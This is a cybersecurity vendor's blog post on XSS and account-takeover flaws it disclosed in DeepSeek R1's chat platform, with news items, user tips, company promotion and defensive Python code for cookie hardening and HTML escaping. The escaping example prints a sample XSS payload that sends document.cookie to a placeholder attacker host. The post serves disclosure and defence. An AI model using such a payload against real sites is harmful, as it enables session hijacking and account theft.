DeepSeek R1, the latest AI model emerging from China, has been making waves in the tech industry due to its advanced reasoning capabilities. Touted as a strong competitor to AI giants like OpenAI, it promises groundbreaking performance in math, coding, and logic. However, behind the excitement lies a critical security risk that cannot be ignored.

Understanding DeepSeek R1

DeepSeek R1 is an advanced AI model developed by DeepSeek, a Chinese AI company that builds open-source large language models (LLMs). Based in Hangzhou, Zhejiang, DeepSeek is owned and funded by the Chinese hedge fund High-Flyer. R1 is designed to tackle complex problems in various domains, including:

- Mathematical Reasoning: Capable of solving intricate mathematical problems with high accuracy.

- Coding and Development: Designed to assist in programming by generating efficient code solutions.

- Logical Problem-Solving: Built with enhanced reasoning abilities to provide structured answers.

- Natural Language Processing: Equipped with improved understanding and contextual awareness to deliver more human-like responses.

The AI model has gained significant popularity due to its capabilities and has been rapidly integrated into various applications. However, the rushed deployment of DeepSeek R1 has left critical security flaws unaddressed, raising serious concerns about data safety.

The use of AI in cybersecurity is growing rapidly, and many companies now treat it as a core part of their security strategy. AI is changing how threats are detected, answered, and prevented: by analyzing large datasets and identifying subtle patterns, AI systems help organizations defend proactively against evolving cyber threats. By automating routine tasks, AI also frees security analysts to focus on more complex challenges. As the technology matures, it is likely to become an increasingly important ally in safeguarding digital assets and keeping businesses resilient against cyber adversaries.

Threatsys Uncovers Critical Vulnerabilities in DeepSeek R1

Threatsys, a leading cybersecurity firm from India, has identified severe vulnerabilities in DeepSeek R1’s web platform. Within a short period, our team discovered multiple critical security flaws, including Cross-Site Scripting (XSS) and Account Takeover (ATO) vulnerabilities, which pose a serious threat to users.

The Security Oversight in DeepSeek R1

The rushed launch of DeepSeek R1 has left major security gaps unaddressed. Our investigation revealed the following concerns:

-

-

Lack of Proper Security Implementation

The platform was launched hastily without adequate security measures, making it an easy target for cyber threats.

-

Cross-Site Scripting (XSS)

Attackers can exploit this flaw to inject malicious scripts into web pages viewed by users, potentially leading to account takeovers.

-

Account Takeover Vulnerability



By leveraging XSS, attackers can steal session cookies, capture login credentials, and gain unauthorized access to user accounts.

-

Log Capture and Data Exposure

We found that sensitive user information, including session logs and cookies, could be intercepted and exploited.

-
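The account takeover described above depends on injected script being able to read the session cookie. A common server-side hardening step is to issue session cookies with the `HttpOnly`, `Secure`, and `SameSite` attributes. The following is only a minimal sketch, assuming a Python backend (DeepSeek's actual stack is not known here), using the standard library's `http.cookies` module; the cookie name `session_id` and the function `build_session_cookie` are hypothetical. Note that `HttpOnly` only prevents a script from reading the cookie: it does not fix the XSS flaw itself, because injected script can still send requests from inside the victim's session.

```python
import secrets
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str, max_age: int = 3600) -> str:
    """Return a Set-Cookie header value for a hardened session cookie.

    'session_id' is a hypothetical cookie name used only for illustration.
    """
    cookie = SimpleCookie()
    cookie["session_id"] = session_id
    morsel = cookie["session_id"]
    # HttpOnly: the cookie is hidden from document.cookie, so an injected
    # script cannot read it and send it to an attacker.
    morsel["httponly"] = True
    # Secure: the browser only sends the cookie over HTTPS.
    morsel["secure"] = True
    # SameSite=Strict: the cookie is not attached to cross-site requests.
    morsel["samesite"] = "Strict"
    morsel["path"] = "/"
    # A short lifetime limits how long a stolen token stays useful.
    morsel["max-age"] = max_age
    return morsel.OutputString()


if __name__ == "__main__":
    # Generate an unguessable session token and print the resulting header.
    token = secrets.token_urlsafe(32)
    print("Set-Cookie: " + build_session_cookie(token))
```

For a token `abc123`, `build_session_cookie("abc123")` returns `session_id=abc123; HttpOnly; Max-Age=3600; Path=/; SameSite=Strict; Secure`.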

Additionally, another cybersecurity firm recently discovered a ClickHouse database leak linked to DeepSeek. This security lapse allowed unauthorized users to gain full control over database operations, raising serious concerns about data privacy and integrity.



Evidence of Vulnerabilities

Threatsys conducted extensive cyber security testing and successfully executed a Cross-Site Scripting (XSS) attack within DeepSeek R1’s chatbot feature. By injecting malicious scripts, we were able to capture user session cookies, which allowed us to gain unauthorized access to user accounts. This demonstrated a critical security flaw where attackers could hijack user sessions and extract sensitive information, highlighting the urgent need for DeepSeek to implement stronger security measures.
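The exact payload and root cause are not described in this article, so the following is only a minimal sketch of the standard defense against this class of flaw, assuming a Python backend that builds chat HTML on the server. Every chat message, whether typed by a user or generated by the model, is treated as untrusted text and HTML-escaped with the standard library's `html.escape` before it is placed in the page. The function `render_chat_message` and its markup are hypothetical, not DeepSeek's code.

```python
import html


def render_chat_message(role: str, text: str) -> str:
    """Return an HTML fragment for one chat message (hypothetical markup).

    Both values may be attacker-controlled: the user types the prompt, and the
    model can be coaxed into echoing HTML back, so both are escaped.
    """
    # quote=True also escapes " and ', so the role is safe inside the
    # double-quoted class attribute as well as in element text.
    safe_role = html.escape(role, quote=True)
    safe_text = html.escape(text, quote=True)
    return f'<div class="msg msg-{safe_role}"><p>{safe_text}</p></div>'


if __name__ == "__main__":
    # A typical cookie-stealing payload (attacker.example is a placeholder domain).
    payload = (
        '<img src=x onerror="fetch(\'https://attacker.example/?c=\''
        ' + document.cookie)">'
    )
    # Prints the payload as inert, escaped text inside the message markup.
    print(render_chat_message("assistant", payload))
```

With this approach, an injected `<img ... onerror=...>` tag is displayed as literal text instead of being executed. If a chat interface renders Markdown or rich HTML from model output, plain escaping no longer fits; the rendered result would instead typically pass through an allow-list HTML sanitizer, ideally backed by a restrictive Content Security Policy.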

Responsible Disclosure and Immediate Action

Threatsys acted swiftly and responsibly by notifying DeepSeek of these vulnerabilities. DeepSeek promptly fixed the reported issues, preventing potential large-scale exploitation. However, this incident highlights a critical lesson for AI developers: security should never be an afterthought.

Broader Implications for the AI Industry

The rise of AI platforms like DeepSeek R1 signals a new era of technological innovation, but it also brings unprecedented cybersecurity challenges. Companies must prioritize security from the outset to protect users from malicious attacks and data breaches.

Indian Government Closely Observing DeepSeek Amid Data Security Concerns

The Indian government is actively scrutinizing the rapid rise of DeepSeek, an artificial intelligence app that has gained significant traction on app stores. Authorities have raised concerns over data security and national sovereignty, particularly due to DeepSeek’s ties to China. The potential risks associated with how Indian users’ data is collected, stored, and managed have heightened vigilance among officials.

IndiaAI Mission: Government to Develop Domestic AI Model with Focus on Sustainability and Security

In response to the recent launch of DeepSeek, a low-cost foundation AI model from a Chinese startup, the Indian government has announced its decision to develop a domestic large language model as part of the Rs 10,370 crore IndiaAI Mission, according to IT Minister Ashwini Vaishnaw.

While the ambition to develop such a model within a constrained budget is commendable, it’s crucial to recognize that sustainability and security are paramount. Developing AI products on a limited budget may lead to challenges in maintaining and updating the models over time. Moreover, as users share vast amounts of information with AI systems, ensuring robust security measures is essential to protect user data and maintain public trust.

The Indian government must prioritize long-term sustainability and implement stringent security protocols in the development of its AI initiatives. This approach will help safeguard user information and ensure the responsible deployment of AI technologies.

Microsoft Investigates Possible Misuse of OpenAI Data by DeepSeek-Linked Group

Microsoft is probing whether a group linked to DeepSeek, a recently launched Chinese AI startup, improperly obtained data from OpenAI. According to sources, Microsoft’s security researchers flagged unusual activity last fall when individuals believed to be connected to DeepSeek extracted large volumes of data via OpenAI’s application programming interface (API).

The activity in question may have violated OpenAI’s terms of service, prompting Microsoft to notify OpenAI about the potential breach. The investigation aims to determine whether the extracted data was used to enhance DeepSeek’s AI models and whether any proprietary information from OpenAI was compromised.

This development comes at a time of growing concerns over AI security and data integrity, particularly with the rise of foundation models competing in global markets. If the allegations hold true, it could raise serious questions about intellectual property protection and ethical AI development.

Neither Microsoft nor OpenAI has yet released an official statement on the matter. However, the probe underscores the importance of stringent security measures in safeguarding AI models and proprietary data from potential misuse.

5 Simple Tips to Protect Yourself from AI Platform Vulnerabilities

While securing AI platforms is primarily the responsibility of developers, users can take proactive steps to protect themselves:

Be Cautious About Sharing Personal Information

- Limit the personal data you provide to AI platforms.

- Avoid linking sensitive accounts, such as primary email or financial accounts.

Use Strong, Unique Passwords

- Create strong passwords for AI platform accounts.

- Enable multi-factor authentication (MFA) for added security.

Beware of Phishing Attempts

- Verify emails and messages claiming to be from AI platforms.

- Avoid clicking suspicious links or providing login credentials.

Monitor Your Accounts for Suspicious Activity

- Regularly review login activity and security alerts.

- Report unauthorized access attempts immediately.

Stay Updated on Security Practices

- Follow security updates and announcements from AI platforms.

- Take advantage of security monitoring services if available.

Conclusion

DeepSeek R1’s vulnerabilities serve as a stark reminder of the importance of robust cybersecurity measures in AI development. While the platform has immense potential, security oversights can lead to severe consequences.

Threatsys is dedicated to safeguarding businesses and individuals against cybersecurity threats. As a trusted leader in cybersecurity, we offer cutting-edge solutions, including Cyber Security Testing, Security Audits, Cyber Security Compliance, SOC as a Service and 360 Degree Cyber Security Services. Our team of experts continuously works to identify and mitigate vulnerabilities in emerging technologies, ensuring a safer digital world.

“Empowering Cybersecurity with Threatsys: Revolutionizing Protection through AI”

How we can help

At Threatsys, we are at the forefront of the cybersecurity industry, and our commitment to staying ahead of cyber threats is unwavering. Emphasizing the transformative power of artificial intelligence (AI) in our cybersecurity services, we have harnessed AI-driven solutions to revolutionize the way we protect our clients’ digital assets.

We have already provided cybersecurity solutions to several chatbot and AI-based companies, ensuring their platforms are fortified against evolving threats. Recently, we collaborated with Nihin Media, a leading AI-driven healthcare platform from Japan, securing their system against cyber threats while ensuring full compliance with international cybersecurity standards.

Additionally, we have successfully implemented best-in-class security measures for Kevit Technologies, a renowned AI and custom chatbot development company. Our expertise helped them achieve robust security compliance, safeguarding their AI solutions from vulnerabilities and cyber-attacks.

By integrating regular penetration testing, compliance audits, red teaming exercises, threat intelligence, and real-time monitoring, Threatsys continues to provide top-tier cybersecurity solutions tailored for AI-powered applications, ensuring seamless and secure user experiences. If you are an AI-driven business looking to enhance your cybersecurity posture, Threatsys is your trusted partner.

At Threatsys, we recognize that embracing AI is not just about technology; it’s about understanding the potential risks and implementing appropriate measures to mitigate them. Our team of experts ensures responsible AI adoption, instilling confidence in our clients that their cybersecurity is in capable hands.

As we continue to emphasize AI in our cyber security services, we remain committed to empowering organizations to safeguard their critical assets and navigate the complexities of the digital world with resilience and confidence. Through cutting-edge AI technologies and a client-centric approach, Threatsys is dedicated to delivering top-notch cyber security solutions that keep our clients ahead of the curve and protected from cyber adversaries.

Increase your preparedness,

Solidify your AI security stance